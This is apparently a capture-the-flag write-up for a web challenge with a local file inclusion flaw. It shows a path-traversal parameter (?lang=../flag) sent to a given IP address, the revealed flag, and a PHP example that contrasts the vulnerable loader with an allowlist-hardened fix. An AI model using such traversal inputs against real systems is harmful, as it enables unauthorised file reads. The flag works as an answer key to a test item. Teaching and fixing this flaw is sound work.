Category
Web
Description
During a pentest on this website, you notice something is off. This web app might be using the path to a file as input! Can you figure out what the vulnerability is and exploit it to find the flag?
Solution
When opening the challenge, we can see one parameter that is used.
http://3.143.112.206/?lang=en
If we change the URL to http://3.143.112.206/?lang=../ we get an error message:
Warning: file_get_contents(../lang/../.txt): Failed to open stream: No such file or directory in /var/www/html/index.php on line 56
The warning reveals how the path is built: the lang parameter is concatenated into ../lang/<lang>.txt without any validation, so the application reads whatever file the parameter points to (a local file inclusion).
If we then change the URL to http://3.143.112.206/?lang=../flag, the path resolves to ../lang/../flag.txt and we get the flag.
ASV{LFI_FTW_2EZ}
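The root cause and its fix, as an added example that is not the challenge's own source: it reconstructs the vulnerable pattern implied by the warning message beside a hardened version that only accepts an allowlist of language codes and checks the resolved path. The file layout (lang/en.txt etc.) and the language codes are assumptions.

```php
<?php
// Added example, not the challenge's index.php. Assumed layout:
// lang/en.txt, lang/fr.txt, lang/de.txt hold the per-language text.

// Vulnerable pattern (as implied by the warning): the parameter is
// concatenated straight into the path, so "../flag" resolves to
// ../lang/../flag.txt and reads a file outside the lang directory.
function load_language_vulnerable(string $lang): string|false
{
    return @file_get_contents('../lang/' . $lang . '.txt');
}

// Hardened: accept only known language codes, then confirm the resolved
// path still lies inside the lang directory before opening it.
const ALLOWED_LANGS = ['en', 'fr', 'de'];

function load_language_safe(string $lang): string|false
{
    if (!in_array($lang, ALLOWED_LANGS, true)) {
        return false; // unknown code: refuse rather than build a path
    }
    $base = realpath(__DIR__ . '/../lang');
    $path = realpath($base . '/' . $lang . '.txt');
    // realpath() returns false for a missing file; the prefix check is
    // defence in depth against traversal or symlinks escaping $base.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return file_get_contents($path);
}

$lang = $_GET['lang'] ?? 'en';
$text = load_language_safe($lang);
if ($text === false) {
    http_response_code(400);
    exit('unsupported language');
}
echo $text;
```

With the allowlist in place, a request such as ?lang=../flag is rejected with a 400 before any file path is built, and the warning that leaked the path layout is never produced.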